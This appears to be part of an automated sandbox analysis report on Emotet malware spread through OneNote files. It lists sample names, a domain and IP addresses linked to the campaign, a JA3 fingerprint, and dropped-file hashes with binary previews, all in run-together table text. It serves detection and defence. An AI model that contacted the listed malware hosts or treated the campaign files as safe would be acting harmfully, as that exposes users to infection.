                                                                                                                                            OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                              OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                  OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                    Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                      opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                        Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                          Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                            omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                              report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                    100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                      NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                        2023-03-16_1753.oneGet hashmaliciousEmotetBrowse

                                                                                                                                                                          Domains

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          penshorn.orgInsight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131

                                                                                                                                                                          ASNs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          RACKCORP-APRackCorpAUInsight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          ce5f3254611a8c095a3d821d44539877Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          aRThcK3rSO.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          click.wsfGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousAmadey, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          purchase_order.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                          • 203.26.41.131

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dllInsight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                            Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                              OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                  Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                    OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                      OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                        OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                          OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                            Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                              opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                  Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                    omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                      report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                        2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                          report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                            100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                              NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                                2023-03-16_1753.oneGet hashmaliciousEmotetBrowse

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):62582
                                                                                                                                                                                                                  Entropy (8bit):7.996063107774368
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                                                                                                                                                  MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                                                                                                                                                  SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                                                                                                                                                  SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                                                                                                                                                  SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):3.1335351732898324
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:kKJ3Gry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:xGCvkPlE99SNxAhUext
                                                                                                                                                                                                                  MD5:2348A16846089A8CC7F2E276A5F28821
                                                                                                                                                                                                                  SHA1:58B0AD4923CA95BEFB7E21CBDFEBE78C908A2820
                                                                                                                                                                                                                  SHA-256:DDA1B612F0440B9FE9316E017C64C23FC5DAF9E9B57238D9608DA80699FADAF2
                                                                                                                                                                                                                  SHA-512:4C1C28BEB093DF9E0E87714E70B083F9B4B0B7DF2FD90C91DE2656733062D842C6EB0B2E7C715B1BC8B251BE7F77DE5C8475D59A2714E6F1896143AD17A3AAFE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:p...... ..........'q.X..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D0161517-DEC8-4879-886E-56C64A97E450

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):154907
                                                                                                                                                                                                                  Entropy (8bit):5.352031190488009
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:N+C76gfYBIB9guw6LQ9DQl+zQxik4F77nXmvidlXRpE6Lhz67:kcQ9DQl+zrXgb
                                                                                                                                                                                                                  MD5:02651796418935DAA4858D11EC71F8E4
                                                                                                                                                                                                                  SHA1:708D8B72102B91DA67FFA5A659874F1DF63BC629
                                                                                                                                                                                                                  SHA-256:260489C32DE29060F062EDB7FBF801F23A1A70787EBD8C78B787D27D4796F49D
                                                                                                                                                                                                                  SHA-512:6A6AB3506AC973B238FC8BB7D0FD9737F8C2814889BEB35398644C2B94E33CBEC8403DA807175C7AA702C3ED6DBEA7ED91C3C657BDA1FE64F95AF6F94F94A6D4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-03-17T08:19:42">.. Build: 16.0.16310.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
